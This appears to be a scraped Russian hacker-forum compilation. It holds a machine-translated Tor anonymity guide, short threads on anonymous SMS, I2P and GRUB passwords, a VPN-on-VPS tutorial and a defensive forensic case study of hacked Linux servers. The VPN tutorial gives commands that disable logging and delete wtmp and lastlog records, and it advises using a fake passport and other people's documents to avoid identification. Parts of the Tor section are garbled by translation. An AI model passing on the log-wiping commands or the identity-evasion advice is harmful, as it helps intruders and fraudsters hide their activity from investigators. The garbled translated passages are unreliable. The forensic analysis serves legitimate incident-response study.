Мосты являются важными инструментами, которые работают во многих случаях, но они не являются абсолютной защитой от технического прогресса, который может сделать противник при идентификации пользователей Tor. Использование мостов может быть целесообразно для предотвращения идентификации пользователя Tor, но [документация мостов проекта Tor ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.torproject.org/docs/bridges) [[архив] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/web.archive.org/web/https://www.torproject.org/docs/bridges)в первую очередь ориентирована на обход цензуры, то есть на преодоление попыток провайдеров или правительства блокировать использование Tor.

Click to expand...

Переключение между Tor и Open Wi-Fi
Некоторые пользователи ошибочно думают, что open Wi-Fi является более быстрой и безопасной альтернативой Tor, поскольку IP-адрес / местоположение не могут быть привязаны к их реальному имени. По причинам, описанным ниже, лучше использовать открытые Wi-Fi и Tor, но не открывать Wi-Fi или Tor.

Приблизительное местоположение любого IP-адреса можно оценить до уровня города, региона или даже улицы. Даже если пользователь находится вдали от своего домашнего адреса, открытый Wi-Fi все равно выдает город или приблизительное местоположение, так как большинство людей не переключают континенты. Лицо, управляющее открытым маршрутизатором Wi-Fi, и его политика также являются неизвестными переменными. Они могут вести журналы MAC-адреса пользователя и связывать его с активностью, отправляемой в clear через них.

Хотя ведение журнала не обязательно нарушает анонимность пользователей, оно сокращает круг подозреваемых от всего мирового населения, континента или страны до конкретного региона. Этот эффект сильно ухудшает анонимность. Пользователи должны всегда хранить как можно больше информации для себя.

Используйте Clearnet и Tor одновременно
Использование не - Tor браузера и браузера Tor одновременно рискует сбить их с толку в один момент и деанонимизировать себя в этом процессе. Также рискованно использовать clearnet и Tor одновременно, поскольку могут быть установлены одновременные, анонимные и неанонимные соединения с сервером.

Одновременные соединения clearnet и Tor (браузер) не рекомендуется использовать по нескольким причинам. Во-первых, пользователь никогда не может быть уверен, когда идентичная страница посещается анонимно и не анонимно одновременно. Причина в том, что виден только URL, а не то, сколько ресурсов извлекается в фоновом режиме. Во-вторых, многие различные веб-сайты размещаются в одном облаке, а такие сервисы, как [Google Analytics ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/marketingplatform.google.com/about/analytics/) [[архив]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/web.archive.org/web/https://marketingplatform.google.com/about/analytics/), присутствуют на большинстве веб-сайтов. Это приводит к тому, что по крайней мере один [известный сборщик данных ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/The_World_Wide_Web_And_Your_Privacy#Data_Collection_Techniques)видит многочисленные анонимные и неанонимные соединения.

Если этот совет игнорируется, то безопаснее использовать по крайней мере два разных настольных компьютера, чтобы не путать один браузер с другим.

Что такое Clearnet?
Этот термин имеет два значения:

Подключение к обычному интернету без использования Tor или других анонимных сетей; и / или

Подключение к обычным серверам, которые не являются услугами onion, независимо от того, используется ли Tor или нет.

Обоснование
Читатель может пропустить этот раздел.

Эта страница рискует заявить о вещах, которые очевидны, но вопрос должен быть задан: "очевидно для кого?". Вышеуказанные пункты могут быть только здравым смыслом для разработчиков, хакеров, гиков и других людей с технологическими навыками.

Вышеупомянутые группы, как правило, теряют контакт с нетехническими пользователями. Иногда полезно читать юзабилити-статьи или отзывы от людей, которые не публикуют сообщения в списках рассылки или на форумах. Рассмотрим примеры ниже:

Для переключения или не для переключения: конец кнопки Torbutton [архив]:

Майк, я полностью обезличен, если я войду в свой аккаунт на facebook? im с помощью firefox 3.6 с tor и без сценария на машине windows 7. Спасибо.

Click to expand...

tor-dev First-time tails / отзывы пользователей о tor [архив]

Устранение стоп-точек при установке и использовании систем анонимности: оценка удобства использования пакета браузера Tor [архив]

Северная Корея: в сети в самой секретной стране мира [архив] ( w [архив]):

Чтобы убедиться, что частоты мобильных телефонов не отслеживаются, я бы наполнил умывальник водой и поставил крышку рисоварки на голову, пока я делал телефонный звонок",-сказал один из собеседников, 28-летний мужчина, который покинул страну в ноябре 2010 года.

Click to expand...

Сноски

например, идентификатор может быть (Flash) cookie с уникальным идентификатором.

К сожалению, защита от отпечатков пальцев еще не совершенна ни в одном браузере, и все еще есть открытые ошибки. Смотрите раздел tbb-linkability [archive] и tbb-fingerprinting [archive].

http://dee.su/liberte [архив]

Quote [archive] (w) [архив]

Так как они известны получателю.

Но эта информация может быть легко установлена с помощью записей ISP, которые связывают учетные записи интернет-служб с зарегистрированным именем и адресом. Кроме того, эта информация просачивается по реальному (clearnet) IP-адресу, который первоначально использовался для регистрации на сервисе в первую очередь, так как регистрация Tor регулярно блокируется.

This was originally posted by adrelanos (proper) to the TorifyHOWTO [archive] (w [archive]) (license [archive]) (w [archive]). Adrelanos did not surrender any copyrights and can therefore re-use it here. It is under the same license as this DoNot page.

См.: TPM-Fail: TPM соответствует атакам синхронизации и решетки [архив] .

https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf [архив]

https://www.loggly.com/ultimate-guide/linux-logging-basics/ [архив]

https://www.thegeekstuff.com/2011/08/linux-var-log-files [архив]

Это еще одна причина, чтобы предпочесть случайное имя, а не реальный при установке операционных систем.

IMSI [архив]

IMEI [архив]

Несмотря на то, что лицо, получающее SMS, вероятно, имеет лишь несколько степеней отделения от конечного пользователя (в лучшем случае).

Например: PDF, текстовый документ, растровые изображения, аудио или видео файлы и так далее.

https://lists.torproject.org/pipermail/tor-dev/2012-April/003472.html [архив]

Браузер Tor должен установить имя пользователя SOCKS для запроса на основе реферера [архив]

https://en.wikipedia.org/wiki/Server_log [архив]

https://en.wikipedia.org/wiki/Deep_packet_inspection [архив]

Первый из них вряд ли когда-либо удалит данные, поскольку профилирование является основным методом монетизации пользователей с "бесплатными" учетными записями. Профилирование используется для таргетированной рекламы и для создания больших пользовательских баз данных, которые могут быть проданы для получения прибыли третьим лицам.

Для переключения или не для переключения: конец кнопки Torbutton [архив]

↑ Facebook Facebook также хранит записи обо всех [архив], кто просматривает страницу с кнопкой "нравится" на Facebook.

https://www.securitee.org/files/trackblock_eurosp2017.pdf [archive]

Топ-15 сторонних услуг являются: doubleclick.net, google.com, googlesyndication.com, googleapis.com, gstatic.com, admob.com, googleanalytics.com, googleusercontent.com, flurry.com, adobe.com, chartboost.com, unity3d.com, facebook.com, amazonaws.com и еще ... tapjoyads.com

Например, твит Twitter, следовать и встроенные твиты используются для записи истории просмотра [архив] . Когда посещается страница, содержащая один или несколько из них, браузер делает запрос к серверам Twitter, который содержит заголовок, информирующий о посещенном сайте. Уникальный файл cookie позволяет Twitter создавать профиль истории просмотра, даже если пользователь не является пользователем Twitter (например, когда браузер Tor не используется).

https://www.securitee.org/files/trackblock_eurosp2017.pdf [архив]

Например, продвинутые противники, как известно, piggyback на сторонних отслеживающих cookies для деанонимизации пользователей Tor и идентификации целей для использования.

https://www.torproject.org/docs/faq.html.en#ChoosePathLength [архив]

https://www.torproject.org/docs/faq.html.en#ChooseEntryExit [архив]

Перед настройкой моста

Атрибуция
Выражаем признательность intrigeri и anonym , которые предоставили отзывы и предложения для этой страницы в списке рассылки Tails-dev.

Анонимный прием звонков и смс. SIP телефония.

ID: 676533bbb4103b69df371cf3
Thread ID: 35058
Created: 2020-02-19T18:21:05+0000
Last Post: 2020-04-08T00:19:20+0000
Author: tanto403
Replies: 4 Views: 2K

Привет. Есть ли возможность сейчас анонимно принимать звонки и sms используя комп.
Может быть есть сервисы которые предоставляют такие услуги за деньги?
Буду признателен за ответ.

I2P, как альтернатива TOR

ID: 676533bbb4103b69df371d76
Thread ID: 27509
Created: 2019-01-28T10:01:46+0000
Last Post: 2019-01-29T06:55:41+0000
Author: Lescer
Replies: 10 Views: 2K

Собственно, хотелось бы узнать, кто юзал I2P, какие есть подводные камни, стоит ли вообще обращать на неё внимание ?

Ставим пароль на GRand Unified Bootloader (Grub)

ID: 676533bbb4103b69df371d78
Thread ID: 27442
Created: 2019-01-23T20:20:59+0000
Last Post: 2019-01-23T20:38:58+0000
Author: zxc21
Replies: 1 Views: 2K

Без пароля на загрузчик, любой пользователь может войти в режим редактирования ядра и внести свои настройки в bootloader, чтобы исключить возможность менять конфигурацию загрузчика вне загруженной системы, нам нужно поставить на него свой пароль.
Конечно от онлайн нападок на машину это врятли спасёт, но от сторонних физических недоброжелателей, в полне таки сойдёт, (хотя и тут ось на флешке придёт на помощь)

Итак, когда мы говорим о парольной защите grub основные вещи которые мы должны знать:

Во первых, существуют 2 типа пользователей: обычный пользователь и суперпользователь (root)

Суперпользователь - создание записей загрузчика.

Обычный пользователь - использование записей загрузчика.

Во вторых это типы паролей:

обычный пароль - который хранится в открытом виде в конфигурационном файле.

Зашифрованный пароль - хранится в зашифрованном виде при помощи алгоритма кеширования PBKDF2.

Давайте рассмотрим структуру записей которые определяют пользователей и суперпользователей, определять их можно в файлах:
00_header и 40_custom внутри каталога /etc/grub.d/

Пока что мы рассматриваем открытые пароли в виде обычного текста.
Пользователь всегда определяется с помощью ключевого слова password , затем указывается имя пользователя, затем пароль:

password user1 gfhjkm1

Пользователя можно повысить до суперпользователя, для этого мы указываем:

set superusers="user1"

Таким образом пользователь становится привилегированным и имеет право на редактирование записей.

Открываем файл 00_header , опускаемся в самый низ, определяем сегмент файла "cat <<EOF EOF" и вносим изменения:

cat <<EOF
set superusers="user1"
password user1 passwd_1
EOF

Click to expand...

И для завершения всего, после указания всех параметров, нам необходимо обновить файл grub.cfg для этого вводим:

$ sudo grub-mkconfig -o /boot/grub/grub.cfg

=============================

Разумеется не безопасно хранить пароли в файлах в открытом виде, для этого можно использовать шифрование, за это отвечает утилита grub-mkpasswd-pbkdf2, в терминале вводим:

$ grub-mkpasswd-pbkdf2
Введите пароль:
Повторно введите пароль:
Хэш PBKDF2 вашего пароля: grub.pbkdf2.sha512.10000.AEBDB73556619C1667319465D2E3E1899AB7
B6F6FDEFF1D00D4701CC84CAA934AFDBBEA47E1EC31AAECA0D9E159C2B
077B8B30D7A41D366FA952CB102D976563.373C1E4EFDBE1AD3641BA08
B0CBC377D8D5BE2451CBE3C9D2450C6BBB321F58789B8441849D4034BA
D86BD0C92C7D695C01D3FA8DF35CADC42D64962C30530C1

Click to expand...

Затем в конфигурационном файле 00_header указываем всё тоже самое, только к паролю добавляете через нижнее подчёркивание алгоритм хеширования _pbkdf2 :

cat <<EOF
set superusers="user1"
_password**pbkdf2** user1 grub.pbkdf2.sha512.10000.AEBDB73556619C1667319465D2E3E1899AB7
B6F6FDEFF1D00D4701CC84CAA934AFDBBEA47E1EC31AAECA0D9E159C2B
077B8B30D7A41D366FA952CB102D976563.373C1E4EFDBE1AD3641BA08
B0CBC377D8D5BE2451CBE3C9D2450C6BBB321F58789B8441849D4034BA
D86BD0C92C7D695C01D3FA8DF35CADC42D64962C30530C1
EOF

Click to expand...

И так же после указания всех параметров, нам необходимо обновить файл grub.cfg:

$ sudo grub-mkconfig -o /boot/grub/grub.cfg

=================================================

Поверхностно расскажу про файл 40_custom, так как в домашних условиях прибегать к его редактированию не вижу смысла (если только кроме вас машиной пользуются ещё человек 10 равшанов)
Файл 40_custom находится в /etc/grub.d/ файл, в отличии от 00_header данный файл позволяет нам зафиксировать записи и количество этих записей и чётко управлять какой пользователь за что отвечает:

set superusers="user1"
password user1 passwd_1
password user2 passswd_2
menuentry 'ОS_#1'{
...
}
menuentry 'ОS_#2' --users user2{
...
}

Click to expand...

Здесь пользователь user1 может загружать и редактировать любую запись, все пользователи имеют право загружать ОS№1_ и только пользователь user2 имеет право загружать ОS№2_
В этом примере приведены пользователи с открытым паролем, но как и в случае с 00_header можно прописать шифрованные PBKDF2 пароли.
Также это можно прописать в grub.cfg на прямую, но дабы не загромождать его, в нём просто прописывается путь к 40_custom

Если вдруг вы всё таки по не осторожности забыли пароль, или кому-то потребовалось его восстановить, то с помощью LiveUsb приводите файл 00_header в свой первоначальный вид.
Это только один из способов запаролить загрузчик, можно обойтись "меньшей кровью" и все изменения произвести только в самом файле grub.cfg.
Также можно пойти другим путём и создать файл passwd и прописать его в grub.cfg , путей решения много и они многогранны как и сам Linux.

[Вопрос]Странные пакеты ловит wireshark

ID: 676533bbb4103b69df371cf5
Thread ID: 35683
Created: 2020-03-23T21:03:09+0000
Last Post: 2020-03-27T11:25:39+0000
Author: hits
Replies: 3 Views: 2K

Всем Хай.Wireshark ловит такие

Spoiler: пакеты

Code:Copy to clipboard

477 504.682816377 HonHaiPr_мак адресс AzureWav_мак адресс ARP 42 Who has 192.168.0.168? Tell 192.168.0.1 478 504.682832678 AzureWav_мак адресс HonHaiPr_мак адресс ARP 42 192.168.0.168 is at мак адресс 2 1.620963627 айпи6 айпи6 ICMPv6 90 Multicast Listener Report Message v2 9 95.106289721 192.168.0.1 224.0.0.1 IGMPv2 42 Membership Query, general 5 35.039450660 192.168.0.1 224.0.0.13 PIMv2 70 Bootstrap 6 60.066766562 192.168.0.1 224.0.0.13 PIMv2 44 Hello 852737 -818.225461750 AzureWav_мак адресс Broadcast ARP 42 Who has 192.168.0.2? Tell 192.168.0.168

далее ещё больше пакетов связанных с AzureWav,чекаю через тулзу arp через некоторое время добавляеться с маком роута доп айпишник этот момент по фиксил прописав постоянный адрес к роуту,но пакатеы все равно лезут в wireshark'e,так же пробывал mitmcanary им чекать,вылетают алертыроут сбрасывал перепрошивал не че не помогает ))) буду благодарен за любую помощь.

Как поднять VPN на своем VPS

ID: 676533bbb4103b69df371cf6
Thread ID: 35327
Created: 2020-03-03T21:08:10+0000
Last Post: 2020-03-25T15:38:13+0000
Author: top
Replies: 2 Views: 2K

Никому нельзя доверять, даже себе
Зачем покупать VPN на стороне, или даже заказывать настройку на своем сервере у фрилансеров, если всё можно сделать самому буквально в два клика?

Для начала рассмотрим плюсы и минусы своего VPN на своем сервере.

Когда вы сами ставите VPN на своем серваке - у больших админов из ДЦ есть возможность снифать ваши пакеты и перехватывать траффик. Так мало того, это фулиганы ещё и имеют полный физический доступ к вашим ключам шифрования.

Будь то VDS или Сервер или даже свой сервер на колокации - расшифровку можно не на стороне сервера делать. OpenVPN будет в памяти процесса, а значит его можно оттуда извлечь, с доступом к памяти процесса вы ничего не сделаете. С чужим ДЦ, чужими каналами и чужой службой безопасности 100% гарантии нет.

Сторонний VPN за деньги.

Когда мы покупаем VPN у какого то сервиса который не ведет логи – мы не можем проверить последнее утверждение на счет логов. А даже если и проверим – сервис даст нам rootа, нет гарантии что в будущем на сервере ситуация не изменится. *nix система сложная туда можно понатыкивать логгеров, так что никто не заметит и долго не будет замечать. Плюсы таких сервисов только в том что можно быстро менять страну сервера, наличие всяких свестелок и перделок типа EasyVPN, сапорт в icq которого можно заебывать вопросами и т.д.

Что же тогда делать в этом страшном мире, как быть

Нужно купить 3G модем или WiMax на левый паспорт и сидеть строго с него и на нем уже юзать OpenVPN он кстате и трафик немного сжимает же еще. Да и квартиру тоже снять на чужие доки и жить там а не по месту прописки. Но лучше домик в пригороде, гусей там завести или баранчиков. Ружье купить, в дворе самовар с сапогом. Баню построить деревянную. Гламурно.. будет

На сокс аккаунты тоже заходить только с 3G+VPN если есть протокол https использовать его. Акаунты регистрировать с левым (не тот который вы всегда используете) логином\паролем а также с наскоряк зарегестрированным разовым e-mail или же разовым.

**Если жы вы все таки решили ставить VPN на своем VPS 'e, приступаем. **

В этой небольшой статье я расскажу как это сделать.

1. Покупаем VPS

Купить его можно где угодно, на ваше усмотрение. Требования для сервера:

Цена - может быть самая низкая. Для редиректа трафика необязательно покупать мощный сервер. Я покупал VPS за $7 в месяц и он отлично справлялся.

Система - в данной статье я опишу настройку CentOS 8.1 x64

Оплата - предпочтительно выбрать хостера, который принимает биткоин или монеро. Для большей анонимности можно пополнить кошелек хостера через менялу или обменники (https://www.bestchange.ru/).

2. Подключаемся.

Если у вас Windows - подключаемся по ssh через программу Putty или аналоги. Вам потребуется указать имя юзера (чаще всего root), IP сервера и пароль.

Есть много статей на эту тему: https://duckduckgo.com/?q=как+подключиться+по+ssh+putty&ia=web

3. Настраиваем сервер

В первую очередь скачаем скрипт настройки с github и загрузим его на наш сервер:

Идём на https://github.com/Nyr/openvpn-install

Жмём зелёную кнопку "Clone or download", потом "Download ZIP"

Распаковываем zip, берем оттуда openvpn-install.sh

Подключаемся к серверу через Filezilla (

) и загружаем openvpn-install.sh в открывшуюся директорию (/root)

Далее переключаемся в консоль сервера (Putty).

Возможно понадобится дополнительно установить iptables:

Code:Copy to clipboard

sudo dnf -y install iptables

Запускаем скрипт:

Code:Copy to clipboard

bash openvpn-install.sh

Скрипт задаст несколько простых вопросов:

IP address: -- указываем IP-адрес вашего сервера, например 192.168.122.198 и жмём Enter

Which protocol do you want for OpenVPN connections? UDP/TCP - выбираем UDP, вводим ответ "1" и Enter

What port do you want OpenVPN listening to? - порт, который будет слушать openvpn. По умолчанию 1194, просто жмём Enter

Which DNS do you want to use with the VPN? - какие dns сервера желаете использовать? Я выбрал OpenDNS - вводим "4" и жмём Enter

Client name: - просит указать название для сертификата. Пишем "client", Enter

Сервер настроен! Скрипт создал конфигурационный файл /root/client.ovpn - надо его скачать на свой компьютер.

Это можно сделать с помощью Filezilla:

3.2. Отключение логов на сервере с VPN

Для этого последовательно выполняем команды:

Code:Copy to clipboard

echo "log /dev/null" >> /etc/openvpn/server/server.conf echo "log-append /dev/null" >> /etc/openvpn/server/server.conf echo "verb 0" >> /etc/openvpn/server/server.conf systemctl restart openvpn-server@server.service sed -i -r 's/authpriv.\*/#authpriv.\*/' /etc/rsyslog.conf /bin/systemctl restart rsyslog.service rm -f /var/log/wtmp rm -f /var/log/lastlog

4. Настраиваем ssh у себя на компьютере

Для этого надо скачать и установить OpenVPN Connect - https://openvpn.net/client-connect-vpn-for-windows/

Файл client.ovpn положить в C:\Program files\OpenVPN\configs\

Запустить OpenVPN. В трее появится иконка, щелкаем по ней правой кнопкой мыши и выбираем установленный конфиг.

Вот и все, проверить анонимность вашего соединения можно на https://whoer.net/

Автор Naladka
взято с exploit.in

Форензик кейс взлома серверов под управлением Linux

ID: 676533bbb4103b69df371cf8
Thread ID: 35614
Created: 2020-03-20T16:29:55+0000
Last Post: 2020-03-20T16:29:55+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 2K

В этой статье мы детально разбираем большой кейс с атакой на целую ферму машин под управлением Linux. Нас ждет взлом веб-сервера, заражение майнером, эскалация root из виртуального контейнера и создание ячейки ботнета, которая рассылала спам. Уже не терпится узнать подробности? Тогда поехали!

Это заключительная часть цикла по форензике для новичков, в котором мы рассказываем о том, что такое цифровая форензика, разбираем наиболее популярные инструменты анализа и изучаем несколько кейсов.

Предыстория инцидента
В мою лабораторию обратился владелец небольшой фирмы, которая занимается предоставлением хостинга, виртуальных серверов VDS/VPS, корпоративной почты и облачного хранилища.

Меня попросили помочь разобраться в аномальном поведении администрируемых заказчиком систем и выявить причины. Если же обнаружатся факты взлома — пресечь каналы несанкционированного доступа и обезопасить хостера от повторных атак.

Сами серверы находились в дата-центре, поэтому вопрос о физическом несанкционированном доступе однозначно снимался.

Вот основные жалобы, с которыми обратился заказчик:

ОС и отдельные демоны работали нестабильно, система часто спонтанно перезагружалась, в syslog шло много критичных ошибок, не зависящих от действий системного администратора;

часто сменялись пики и падения на графиках загрузки ввода-вывода и сетевого трафика;

IP-адреса из выделенного пула часто попадали в черные списки;

при работе легитимных администраторов с системой соединение SSL часто обрывалось по разным сценариям;

периодически сбрасывались настройки пакетного фильтра iptables на значения по умолчанию.

В работе системы наблюдались и другие, более мелкие аномалии. Причем проверки на предмет наличия вирусов и руткитов такими известными утилитами, как rkhunter, chkrootkit и ClamAV, результата не дали.

В качестве утешения все системы также прогонялись в режиме полной проверки через пару популярных антивирусов для Windows. Как вы можете догадаться, результат тоже был нулевой. Заказчик отметил, что в редких случаях временно помогало восстановление из резервной копии, однако эффект длился недолго.

Все это давало основание предполагать, что причиной происходящего было сознательное вмешательство третьих лиц в работу машин.

Однако попытки самостоятельных поисков, такие как анализ журналов, безопасное конфигурирование iptables, перенос прикладных сервисов в chroot, использование длинных и сложных паролей, парсинг сетевого трафика с помощью Wireshark и подобных утилит, никаких следов хакерского взлома не выявили.

Поиск артефактов
О том, как проводить предварительный сбор информации, мы рассказывали в предыдущей статье. Сейчас приступим к самому трудоемкому и ответственному этапу форензики анализа, а именно поиск артефактов в уже имеющихся данных. Мы будем использовать как ранее знакомые нам по расследованию истории с ноутбуком инструменты, так и совершенно новые.

Извлекаем данные из оперативной памяти
Для анализа образа RAM мы выбрали хорошо зарекомендовавший себя пакет утилит Volatility Framework. По умолчанию он уже должен быть у вас установлен, но если вдруг произошло невероятное и его нет, то накатить свежую версию секундное дело:

Code:Copy to clipboard

$ sudo apt-get install volatility volatility-profiles volatility-tools

Как вариант, вы всегда сможете скачать и установить пакет из исходников.

Рабочее окно Volatility Framework после запуска

После этого нам надо сгенерировать volatility profile, который зависит от версии ядра операционной системы. Чтобы не терять время зря, можно воспользоваться приложенным к статье готовым скриптом (см. врезку со скриптами ниже), который соберет профиль в автоматическим режиме.

После того как профиль сгенерирован и выбран, запуск утилиты в общем виде выглядит так:

Code:Copy to clipboard

$ ./vol.py –profile=<имя профиля> -f <файл образ RAM> <команда>

К примеру, запуск Volatility с вызовом команды pslist для получения списка процессов будет таким:

Code:Copy to clipboard

$ ./vol.py –profile=KaliLinux-19_02-25_16_0-30x64 -f ~/cases/pfe1/ram_image.lime linux_pslist

Аналогичный результат можно получить и другой командой:

Code:Copy to clipboard

$ ./vol.py –profile=KaliLinux-19_02-25_16_0-30x64 -f ~/cases/pfe1/ram_image.lime linux_psaux

Теперь попробуем выстроить карту процессов с флагами разрешений и списком сегментов:

Code:Copy to clipboard

$ ./vol.py –profile=KaliLinux-19_02-25_16_0-30x64 -f ~/cases/pfe1/ram_image.lime linux_proc_maps

Эта команда зачастую используется при поиске следов вредоноса, которая может внедряться в благонадежные процессы системы или пользователя.

Извлечение и просмотр истории команд bash:

Code:Copy to clipboard

$ ./vol.py –profile=KaliLinux-19_02-25_16_0-30x64 -f ~/cases/pfe1/ram_image.lime linux_bash

Наконец, проверка файловых операций с целью поиска следов возможной модификации руткитом выглядит так:

Code:Copy to clipboard

$ ./vol.py –profile=KaliLinux-19_02-25_16_0-30x64 -f ~/cases/pfe1/ram_image.lime linux_check_fop

Для наших самых любознательных читателей существует один довольно полезный скрипт, автоматизирующий парсинг содержимого RAM. Но я предлагаю оставить его для факультативного изучения.

Анализ образа жесткого диска
На следующем этапе нашего расследования тщательному изучению подверглись HDD скомпрометированных машин. Как правило, объем данных здесь всегда большой и просмотреть все вручную (да еще и в разумные сроки) нереально. Именно на такой случай в арсенале полезно держать специализированные скрипты, которые помогают собрать и представить в сжатой форме сведения об артефактах.

Ниже мы будем использовать как bash-скрипты, так и нативные утилиты для сбора данных. Часть скриптов была позаимствована из замечательной книги [Linux Forensics](https://www.amazon.com/Linux-Forensics-Philip- Polstra/dp/1515037630/) (Philip Polstra, 2015). Основная задача заключается в том, чтобы собрать необходимую информацию и экспортировать ее в отдельную базу MySQL, создавая таким образом «электронный архив цифровых доказательств».

Вспомогательные скрипты:

create-profile.sh — скрипт для генерации volatility profile;

get-histories.sh — поиск истории вводимых команд системной оболочки bash;

get-logfiles.sh — сбор и каталогизация всех логов системы;

get-logins.sh — сбор данных о фактах авторизации в ОС и неудачных попыток логона.

Поиск файлов с установленными битами SUID и SGID:

Code:Copy to clipboard

$ find / -perm -4000 –type f -xdev -print > suid.txt $ find / -perm -2000 –type f -xdev -print > sgid.txt

Список последних модифицированных, открытых и созданных файлов в системе:

Code:Copy to clipboard

$ find / -mtime 5 –xdev > modified.txt $ find / -atime 5 –xdev > accessed.txt $ find / -ctime 5 –xdev > created.txt

Вывод списка модифицированных файлов (с момента первичной инсталляции), измененных менеджером пакетов, на разных системах различается. Команда для дистрибутивов с RPM:

Code:Copy to clipboard

$ rpm -V -a

И команда для дистрибутивов на основе Debian, с помощью debsums:

Code:Copy to clipboard

$ debsums -ca

Поиск и просмотр скрытых файлов и директорий:

Code:Copy to clipboard

$ find . –type f –exec ls –i {} \; | sort –n

Ручной просмотр заданий сron:

Code:Copy to clipboard

$ less /etc/cron.hourly $ less /etc/cron.daily $ less /etc/cron.weekly $ less /etc/cron.monthly

Для поиска удаленных файлов, построения timeline-шкалы активности, анализа метаданных и поиска по ключевым словам отлично подойдет уже знакомая программа Autopsy из пакета The Sleuth Kit. К сожалению, в нашем случае применение Autopsy никаких значимых результатов не принесло. Что ж, тем интересней.

Поиск артефактов в PCAP-дампе
Задачей анализа было максимально подробно выяснить, какие сетевые соединения поднимались, идентифицировать порты, используемые протоколы, тип передаваемых данных, аномальные значения флагов в TCP-датаграммах. На основании этих данных можно попытаться определить вероятные факты несанкционированного подключения к [C&C](https://whatis.techtarget.com/definition/command-and-control-server-CC- server), DNS-туннелирования и подобной подозрительной активности.

Основные надежды в этом расследовании я связывал с Xplico. Это часть Network Forensic Analysis Tool (NFAT), большого фреймворка, предназначенного как раз для анализа сетевого трафика. Из особенностей утилиты можно отметить возможности извлечения email (протоколы POP, IMAP и SMTP), всего содержимого HTTP, данные звонков VoIP (SIP), файловых доступов FTP, TFTP и много других полезных фич. В общем, довольно крутая штука!

По умолчанию я считаю, что Xplico уже присутствует в вашей системе. Запускаем веб-интерфейс:

Code:Copy to clipboard

$ service apache2 start $ /etc/init.d/xplico start

Далее в браузере переходим по адресу http://localhost:9876. Базовые настройки для авторизации:

Code:Copy to clipboard

Пользователь: admin, xplico Пароль: xplico, xplico

Теперь создаем задание (case) и добавляем к нему комментарии. Загружаем наш файл PCAP и запускаем сессию для анализа. Потребуется некоторое время, так что можно идти пить кофе. Если парсинг прошел успешно, то мы получаем статистику и вывод в графическом режиме всех технических данных. После этого по признакам компрометации мы ищем факты «аномального» поведения.

Формирование задания на анализ файла PCAP в Xplico

Дашборд-панель (пока еще пустая) с выводом

Результат анализа PCAP в Xplico
На первый взгляд сетевой дамп выглядел хорошо. Даже слишком хорошо. А это, как вы догадываетесь, повод для первых сомнений.

Анализ артефактов, собранных с живых систем
Параллельно со снятием дампов на рабочие системы была установлена утилита аудита Auditd и включен более глубокий уровень сбора событий с помощью стандартных возможностей Syslog. Как выяснилось позднее, хакеры довольно тщательно терли логи в Syslog, и чего-то существенного вытащить оттуда не удалось. А вот собранная Auditd информация оказалась очень любопытной.

К концу недели мы обнаружили массу свидетельств несанкционированного вмешательства третьих лиц в работу системы. В их числе перезапуск демонов с правами суперпользователя, сброс настроек iptables к значениям по умолчанию, изменение таблицы маршрутизации веб-сервера, а также удаление файлов, которые так или иначе могли бы выдать деятельность хакеров.

После всех этих событий лично у меня уже была твердая уверенность, что мы имеем дело не просто со сбоями. Тут явно прослеживались целенаправленные внешние воздействия, с не самыми дружелюбными намерениями.

Дополнительные инструменты поиска артефактов
В профилактических целях и для оценки общего состояния [защищенности](https://blog.itfreedom.com/blog/patch-management-vs- vulnerability-mangement) нашей системы был использован широко известный Nmap с плагинами NSE Vulns CVE. Он незатратен по ресурсам, прост в использовании, да еще и скорость работы впечатляет. Но для нас главное то, что Nmap эффективно показывает все проблемы с обновлениями. Удобно, что сканирование можно запустить с одной машины, указав в качестве цели отдельный хост или целую подсеть. Таким образом было найдено несколько критических уязвимостей, которые сыграли ключевую роль в этой истории.

Результат сканирования на уязвимости локального хоста с помощью Nmap

Следующим этапом мы прогнали Loki (Simple IOC and Incident Response Scanner). Очень толковый сканер для обнаружения самых незаметных [индикаторов компрометации](https://encyclopedia.kaspersky.ru/glossary/indicator-of- compromise-ioc/).

Loki использует базу данных Yara и проводит поиск бинарного кода по регулярным выражениям, хеш-суммам, точкам обратной сетевой связи с C2 и тому подобным прекурсорам. С помощью Loki и одного кастомного AV-движка удалось обнаружить часть двоичного кода майнера, бинарники для создания ботнета и веб-оболочку, залитую на хакнутый веб-сервер. Ого!

Запуск сканера Loki

Для оценки безопасности веб-сервера и его составляющих, кроме ручных проверок, применялись автоматические тесты из арсенала WASS. Конкретно в нашем случае это были w3af, Wapiti и sqlmap. Отчет показал наличие LFI-уязвимости в движке PHP, слабую защищенность конфигурации сервера Apache и вероятность дампа MySQL базы данных.

Для оценки hardening security state операционных систем Linux, работающих на серверах нашего хостинга, мы пользовались целым набором утилит аудита Linux. Для дополнительной уверенности в ход была пущена программа Tiger (The UNIX Security audit and intrusion detection tool). И, как оказалось, у многих машин hardening index едва дотягивал до 35 баллов из 100. Думаю, комментарии излишни.

Вывод результатов работы утилиты Tiger
С помощью встроенных алгоритмов обнаружения UTM-шлюза, через который проходил весь трафик, было выявлено DNS-туннелирование. Однако это фича самого устройства: средств для ручного поиска я не использовал. Сам факт туннелирования подтвердил изначальное предположение, что хакеры удаленно управляют взломанными машинами.

Как это было на самом деле
После всех описанных выше действий у нас на руках была целая база доказательств о компрометации машин нашего клиента. Но мало просто собрать информацию — нужно систематизировать полученные сведения, так что впереди был кропотливый труд. Артефакты, объекты воздействия и все найденные уязвимости постепенно формировали единую цепочку событий, которая позволила воссоздать сценарий дерзкой атаки.

Впрочем, тут нужно сделать небольшую оговорку. Ниже приведена лишь наиболее вероятная последовательность действий преступников. Некоторые отдельные моменты достоверно установить не представлялось возможным, но на общую картину они мало влияют. Поэтому будем отталкиваться от исходных данных, делая разумные допущения по ходу событий.

Важно также заметить, что атаки проводились одновременно или с небольшим интервалом по времени сразу на несколько систем, независимо друг от друга. При этом на каждом этапе злоумышленники преследовали вполне конкретные цели.

Враг внутри
Все началось с того, что в хостинге на подставное лицо был арендован VPS под управлением CentOS 7. Как выяснилось впоследствии, установленный дистрибутив имел непропатченную уязвимость Dirty Cow, о которой можно даже почитать на отдельном сайте. Напомню, уникальность этой уязвимости заключается в том, что с помощью готовых инструментов хакер не только получает полный доступ к локальной машине, но и может выйти за пределы контейнера (если это слой визуализации) и попасть на машину-гипервизор с привилегиям суперпользователя!

